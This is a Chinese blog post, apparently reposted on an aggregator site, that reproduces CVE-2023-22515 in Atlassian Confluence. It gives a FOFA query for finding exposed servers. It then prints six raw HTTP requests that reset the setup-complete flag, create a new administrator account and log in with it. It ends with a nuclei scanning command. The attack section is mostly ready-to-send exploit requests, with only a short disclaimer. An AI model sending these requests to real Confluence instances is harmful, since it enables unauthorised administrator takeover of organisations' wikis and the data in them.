Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)

2023-11-02 18:30
文章标签 2023 漏洞 管理 用户 授权 复现 cve confluence 22515

本文主要是介绍Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Confluence未授权管理用户添加漏洞复现 【CVE-2023-22515】

  • 一、漏洞描述
  • 二、漏洞影响版本
  • 三、网络空间测绘查询
  • 四、漏洞复现
    • 1.手动复现
    • 2.自动化复现
      • 小龙POC检测
      • nuclei检测

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

Atlassian Confluence是企业广泛使用的wiki系统。
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。

二、漏洞影响版本

version>8.0.0
在这里插入图片描述

三、网络空间测绘查询

fofa:app=“ATLASSIAN-Confluence”

在这里插入图片描述

四、漏洞复现

1.手动复现

我不知道网上的3个POC就能成功是怎么来的,但是我亲测,根本不行

下面上真实可行的

POC1:

GET /setup/setupadministrator-start.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate

POC2:

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2Xc2rpUfLGuc1EKqJouRSWI94Wl HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Cookie: JSESSIONID=1962746C401654F1C9EA4A6C3DDA2436
Accept-Encoding: gzip, deflate

POC3:

GET /setup/setupadministrator-start.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Cookie: JSESSIONID=1962746C401654F1C9EA4A6C3DDA2436
Accept-Encoding: gzip, deflatePOC4:
```csharp
POST /setup/setupadministrator.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 128
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=1962746C401654F1C9EA4A6C3DDA2436
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflateusername=duirzzohm7&fullName=admin&email=DuirZZohM7@JPaUY5kHTc.com&password=JPaUY5kHTc&confirm=JPaUY5kHTc&setup-next-button=Next

POC5:

POST /dologin.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
Connection: close
Content-Length: 89
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=896D0568141AE152F06EEB4CFBF79211; seraph.confluence=31228104%3A5f386933f77f200a19ab411064417b393386d2ec
X-Atlassian-Token: no-check
Accept-Encoding: gzip, deflateos_username=duirzzohm7&os_password=JPaUY5kHTc&login=Log+in&os_destination=%2Findex.action

POC6:

GET /welcome.action HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Cookie: JSESSIONID=896D0568141AE152F06EEB4CFBF79211; seraph.confluence=31228104%3A5f386933f77f200a19ab411064417b393386d2ec
Accept-Encoding: gzip, deflate

成功登录结果如图

在这里插入图片描述

2.自动化复现

小龙POC检测

在这里插入图片描述

nuclei检测

我这里开了代理,不要可以去掉

nuclei.exe -t /http/cves/2023/CVE-2023-22515.yaml -l test104.txt -proxy http://127.0.0.1:8080 -stats

结果如图

在这里插入图片描述

这篇关于Confluence未授权管理用户添加漏洞复现 (CVE-2023-22515)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/332447

相关文章

MySQL 用户创建与授权最佳实践

MySQL 用户创建与授权最佳实践

《MySQL用户创建与授权最佳实践》在MySQL中,用户管理和权限控制是数据库安全的重要组成部分,下面详细介绍如何在MySQL中创建用户并授予适当的权限,感兴趣的朋友跟随小编一起看看吧... 目录mysql 用户创建与授权详解一、MySQL用户管理基础1. 用户账户组成2. 查看现有用户二、创建用户1. 基
阅读更多...
使用jenv工具管理多个JDK版本的方法步骤

使用jenv工具管理多个JDK版本的方法步骤

《使用jenv工具管理多个JDK版本的方法步骤》jenv是一个开源的Java环境管理工具,旨在帮助开发者在同一台机器上轻松管理和切换多个Java版本,:本文主要介绍使用jenv工具管理多个JD... 目录一、jenv到底是干啥的?二、jenv的核心功能(一)管理多个Java版本(二)支持插件扩展(三)环境隔
阅读更多...
Python中文件读取操作漏洞深度解析与防护指南

Python中文件读取操作漏洞深度解析与防护指南

《Python中文件读取操作漏洞深度解析与防护指南》在Web应用开发中,文件操作是最基础也最危险的功能之一,这篇文章将全面剖析Python环境中常见的文件读取漏洞类型,成因及防护方案,感兴趣的小伙伴可... 目录引言一、静态资源处理中的路径穿越漏洞1.1 典型漏洞场景1.2 os.path.join()的陷
阅读更多...
Python中bisect_left 函数实现高效插入与有序列表管理

Python中bisect_left 函数实现高效插入与有序列表管理

《Python中bisect_left函数实现高效插入与有序列表管理》Python的bisect_left函数通过二分查找高效定位有序列表插入位置,与bisect_right的区别在于处理重复元素时... 目录一、bisect_left 基本介绍1.1 函数定义1.2 核心功能二、bisect_left 与
阅读更多...
Spring中管理bean对象的方式(专业级说明)

Spring中管理bean对象的方式(专业级说明)

《Spring中管理bean对象的方式(专业级说明)》在Spring框架中,Bean的管理是核心功能,主要通过IoC(控制反转)容器实现,下面给大家介绍Spring中管理bean对象的方式,感兴趣的朋... 目录1.Bean的声明与注册1.1 基于XML配置1.2 基于注解(主流方式)1.3 基于Java
阅读更多...
基于Python+PyQt5打造一个跨平台Emoji表情管理神器

基于Python+PyQt5打造一个跨平台Emoji表情管理神器

《基于Python+PyQt5打造一个跨平台Emoji表情管理神器》在当今数字化社交时代,Emoji已成为全球通用的视觉语言,本文主要为大家详细介绍了如何使用Python和PyQt5开发一个功能全面的... 目录概述功能特性1. 全量Emoji集合2. 智能搜索系统3. 高效交互设计4. 现代化UI展示效果
阅读更多...
Mysql中的用户管理实践

Mysql中的用户管理实践

《Mysql中的用户管理实践》:本文主要介绍Mysql中的用户管理实践,本文通过实例代码给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友参考下吧... 目录13. 用户管理13.1 用户 13.1.1 用户信息 13.1.2 创建用户 13.1.3 删除用户 13.1.4 修改用户
阅读更多...
linux服务之NIS账户管理服务方式

linux服务之NIS账户管理服务方式

《linux服务之NIS账户管理服务方式》:本文主要介绍linux服务之NIS账户管理服务方式,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录一、所需要的软件二、服务器配置1、安装 NIS 服务2、设定 NIS 的域名 (NIS domain name)3、修改主
阅读更多...
详解如何在SpringBoot控制器中处理用户数据

详解如何在SpringBoot控制器中处理用户数据

《详解如何在SpringBoot控制器中处理用户数据》在SpringBoot应用开发中,控制器(Controller)扮演着至关重要的角色,它负责接收用户请求、处理数据并返回响应,本文将深入浅出地讲解... 目录一、获取请求参数1.1 获取查询参数1.2 获取路径参数二、处理表单提交2.1 处理表单数据三、
阅读更多...
Python+PyQt5开发一个Windows电脑启动项管理神器

Python+PyQt5开发一个Windows电脑启动项管理神器

《Python+PyQt5开发一个Windows电脑启动项管理神器》:本文主要介绍如何使用PyQt5开发一款颜值与功能并存的Windows启动项管理工具,不仅能查看/删除现有启动项,还能智能添加新... 目录开篇:为什么我们需要启动项管理工具功能全景图核心技术解析1. Windows注册表操作2. 启动文件
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2